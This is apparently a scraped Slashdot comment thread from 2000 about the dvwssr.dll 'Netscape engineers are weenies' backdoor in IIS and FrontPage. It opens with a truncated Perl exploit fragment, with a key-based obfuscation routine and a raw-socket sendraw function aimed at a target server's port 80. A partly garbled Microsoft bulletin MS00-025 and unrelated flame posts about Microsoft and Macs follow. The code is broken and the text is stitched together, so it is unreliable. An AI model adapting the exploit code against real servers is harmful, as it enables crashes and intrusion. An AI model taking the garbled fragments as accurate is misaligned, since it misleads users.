my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmno
#
#
my $key="Netscape engineers are weenies!";
#
#
my $kc=length($from)
my ($fv,$kv,$tmp,$to,$lett)
@letts=split(//,$from);
foreach $lett (@letts){
$fv=index $slide, $lett;
$fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0);
$kv=index $slide, substr $key, $kc, 1;
if($kv>=0 && $fv>=0){
$tmp= $kv - $fv;
if($tmp = length($key)){ $kc=0;}
}return $to;}
sub sendraw {
my ($pstr)=@_;
my $target;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,2,1,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr; my @in=;
select(STDOUT); close(S);
return @in;
} else { die("Can't connect...\n"); }}
-----------------------------------------------
Well this might some juicy notes for judge Jackson, he might send Bill Gates to "Death Row"
for this. Well take it with a piece of salt i guess.
Anyway what makes me feel sick here too, are those
stupid www.questionexchange.com banner adds here.
I don't like them.
Robert
The anti-Slashdot lies need to stop. Slashdot ran the story based on many, many reports, including an admission from MS, that there was a hole. When the reports were found to be inaccurate, Slashdot posted that fact as well. There is no Slashdot conspiracy here -- there are just a lot of pseudo-radicals who think flaming makes them activists.
Facts:
- IIS w/ option pack HAS a "backdoor" with "netscapeengeniersareweenies" (or something like that).
- It allows every user with access to read all other user's
.asp files. This seems not to be a bug! - I HAVE SEEN IT WORK.
- So as it is would affect mostly web-hosting companies
- BUT, Core-SDI's Gera and Beto have found a buffer overflow vulnerability.
- It lets ANYBODY on the internet to crash a IIS with mentioned option pack (called a DOS).
- It is demonstrated using a perl script posted on BUGTRAQ.
- It seems HIGLY POSSIBLE to use THIS buffer overflow for arbitrary remote code execution.
- I HAVE SEEN IT WORK.
- So as it is affect ALL IIS w/ option pack4 on the net!!!
Notes:I'm the person who originally explored the security issues with Frontpage. My rantings are detailed (err, carved in stone unfortunately) on several security websites.
Incidentally, there is a rogue bit of code in the Visual interdev libs that ship with Frontpage 98 NT extensions. This code (as evidenced) allows backdooring of administrator access.
At no time were the Unix extensions vulnerable to this bit of code jocky arrogance.
Later...
this is simply more proof that even people who are in the "know" of MS software, still don't have a clue what the hell MS is doing:
Whatever it is, it appears to be meaningless junk text used as data.
pardon me for not sharing your apathy towards the subject, but perhaps we should let real programmers write real applications, and not half-hearted attemps at joke programs with "meaningless junk text" sprinkled in for laughs...
Hammer of Truth
Because we don't have the source to IIS, we couldn't check for ourselves, so when people who we trust more then MS (for good reason - they are somewhat unbiased) made an allergation we believed them.
That's the reason Open Source is better - the security expects (or us) could have checked the source, seen no real hole, retested the scenerio, and seen what was really going on.
-----BEGIN PGP SIGNED MESSAGE-----
t in/fq00-025.asp
.dll were copied to a folder with lower
.asp pages using
n /fq00-025.asp. . asp.
u lt.asp.
- --------------
D 2TxY4LZXsCLGkQgq d pY9rCW39DWCzJxo0 Q OVh/xBLvjCz1KakZ B mBJHsDOBP++3WoDA L c2nsj4AtylFynqRD i sV/oig==
Microsoft Security Bulletin (MS00-025)
- --------------------------------------
Procedure Available to Eliminate "Link View Server-Side Component"
Vulnerability
Originally Posted: April 14, 2000
Updated: April 17, 2000
Summary
=======
On April 14, 2000, Microsoft issued the original version of this
bulletin, to discuss a security vulnerability affecting several web
server products. Shortly after publishing the bulletin, we learned of
a new, separate vulnerability that increased the threat to users of
these products. We updated the bulletin later on April 14, 2000, to
advise customers of the new vulnerability, and noted that we would
provide additional details when known. On April 17, 2000, we updated
the bulletin again to provide those details.
A procedure is available to eliminate a security vulnerability that
could allow a malicious user to cause a web server to crash, or
potentially run arbitrary code on the server, if certain permissions
have been changed from their default settings to inappropriate ones.
Although this bulletin has been updated several times as the
investigation of this issue has progressed, the remediation steps
have always remained the same - customers running affected web servers
should delete the affected file, Dvwssr.dll. Customers who have done
this at any point in the past do not need to take any further action.
Frequently asked questions regarding this vulnerability and
the procedure can be found at
http://www.microsoft.com/technet/security/bulle
Issue
=====
Dvwssr.dll is a server-side component used to support the Link View
feature in Visual Interdev 1.0. However, it contains an unchecked
buffer. If overrun with random data, it could be used to cause an
affected server to crash, or could allow arbitrary code to run on the
server in a System context.
By default, the affected component, Dvwssr.dll, resides in a folder
whose permissions only allow web authors to execute it. Under these
conditions, only a person with web author privileges could exploit the
vulnerability - but a web author already has the ability to upload
and execute code of his choice, so this case represents little
additional threat. However, if the permissions on the folder were set
inappropriately, or the
permissions, it could be possible for other users to execute the
component and exploit the vulnerability.
Affected Software Versions
==========================
The affected component is part of Visual Interdev 1.0. However, it is
a server-side component, and is included in the following products:
- Microsoft(r) Windows NT(r) 4.0 Option Pack, which is the
primary distribution mechanism for Internet Information
Server 4.0
- Personal Web Server 4.0, which ships as part of
Windows(r) 95 and 98
- Front Page 98 Server Extensions, which ships as part of
Front Page 98.
NOTE:
1. Windows 2000 is not affected by this vulnerability. Upgrading
from an affected Windows NT 4.0 to Windows 2000 removes the
vulnerability.
2. Installing Office 2000 Server Extensions on an affected server
removes this vulnerability.
3. Installing FrontPage 2000 Server Extensions on an affected
server removes this vulnerability.
Remediation
===========
To eliminate this vulnerability, customers who are hosting web sites
using any of the affected products should delete all copies of the
file Dvwssr.dll from their servers. The FAQ provides step-by-step
instructions for doing this. The only functionality lost by deleting
the file is the ability to generate link views of
Visual Interdev 1.0.
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-025,
http://www.microsoft.com/technet/security/bulleti
- Microsoft Knowledge Base article Q259799 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default
Obtaining Support on this Issue
===============================
Information on contacting Microsoft Technical Support is available
at http://support.microsoft.com/support/contact/defa
Revisions
=========
- April 14, 2000: Bulletin Created.
- April 14, 2000: Bulletin updated to provide preliminary results
of investigation of buffer overrun vulnerability.
- April 17, 2000: Bulletin updated to provide final results of
investigation.
- -------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED
"AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL
WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT
SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES
WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL,
LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT
CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF
LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING
LIMITATION MAY NOT APPLY.
Last updated April 17, 2000
(c) 2000 Microsoft Corporation. All rights reserved. Terms of use.
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2
iQEVAwUBOPtK540ZSRQxA/UrAQFLNAf/f+J9Gu2bLni4x+C
hXiEcNVlqccSClIRg84zlYL2KDGkDCwQWtE8JR93V0MkirO
2wKI9NaPJl8cgbMiFWpRErw8ojHoX+fgtWqBGbGnZPxShCm
GrzNecfyK58aT3Ao2w8uxAfLp8z0Kzuaj+YYmkLq36/TPUk
1Dxe9/zahwMd7wwtwdQGtFUD9iQYVB3zd8QnYZCiwUOJR6f
Mg4lsvMjDzHZj6p5JMbxpzebymWTjPgTd5hr66ZBdtb8Cdw
=6B1q
-----END PGP SIGNATURE-----
Precisely. That's why I use *nix -- winbloze has neither grep nor cron.
DNA is a Turing machine. You, however, being dynamic and emergent, are not.
Moderate it down, moderate correctly. I have to agreee with the other posts about moderation.. What the hell is going on here. enlighten me on what "If you stick your head in the ground and ignore or dismiss the negaive actions of powerful entities, they will have no recourse but to continue with that course of action, because it's obvious nobody cares. It's the same with your average eight-year old. " means. So it means now if you bust your ass working on linux stuff and some coroporation is still making millions life is good because your not an 8 year old? Gimme a break people. Microsoft is Microsoft, you people BOUGHT there software or COMPUTERS with it on there. You could have bought OS/2, Apples, or even kept the faith in very advanced for its day NeXT Boxes or BeBoxes. The consumer was the one putting there faith in Microsoft. Should we sue mcdonalds because it makes people fat and really taists like shit but the commercials make me buy it or because its the only joint on my bock its now unfair competition and they have to be sued until someone else with another shitty ass hamburger can come back in? My god. CHOICE PEOPLE! you chose a FUCKEN LAWYER to win your battle. Now think about that. You didn't choose NOT to run a Microsoft Product, you chose to waiste money on supporting a government that is just as unruely and unjust as any corporation that exists. Fear the capitalism? them move somewhere else or leave it be. DON'T take my choice! I still run Windows, I still run OS/2, i still use Linux. MY Choice. I didn't support nor write my legislature/senators to sue microsoft, that is BS. I didn't buy a distro because THAT is BS. Buying something that *IS* free for the sake of Support? If the INFORMATION is free, why would you NEED support? If it was intuitive enough, what would be so hard that you need support????? Why should redhat get my money moreso then microsoft? Atleast with microsoft i see Innovative features such as the highly popular portals/email/mapping systems, kick as gaming, ease of use, quick adaptation, forward looking and forward thinking design and gui concepts? I mean for the first time in computer la la land there is consistancy and a huge market.
And we want to distroy that because people are naive and want to accept freedoms and not be forced to choose? Microsoft didnt FORCE windows. Microsoft didn't FORCE anyting. They played the game and the lil boys lost.. wooopideee dooo. They aquired when nescape could have aquired. Why didn't netscape team up with IBM to compete with microsoft? I won't even go any further, as its pointless reall..
AC, I am uncertain what you mean by multitask. Multitasking on a Macintosh was intruduced with system 6 in the late 1980's. On my work Mac I run and use at least 1 web browser with several windows open, 1 email client, and 1 text editor (BBEdit) for HTML/code editing. In addition I may have some or _all_ of the following running at once: Photoshop, Illustrator, Acrobat 4 (not reader), Distiller, IE 2/3/4/5. Please let me know if you have a definition of Multi-tasking that means something other than running and using multiple programs at one time.
As far as rebooting when fatal errors occur, I fail to see how this is much different from a BSOD.
As far as FPU performance, weren't pc users claiming that integer performance was more important a few years ago before the G3 & G4 started mopping the floor with your asses? Please note comparisons where a G3 beats dual PII machines and single PIIIs.
I would also strongly advise that if you checked carefully you would find your head was lodged so far up your rectum that you could kiss your own heart.
Good day, sir.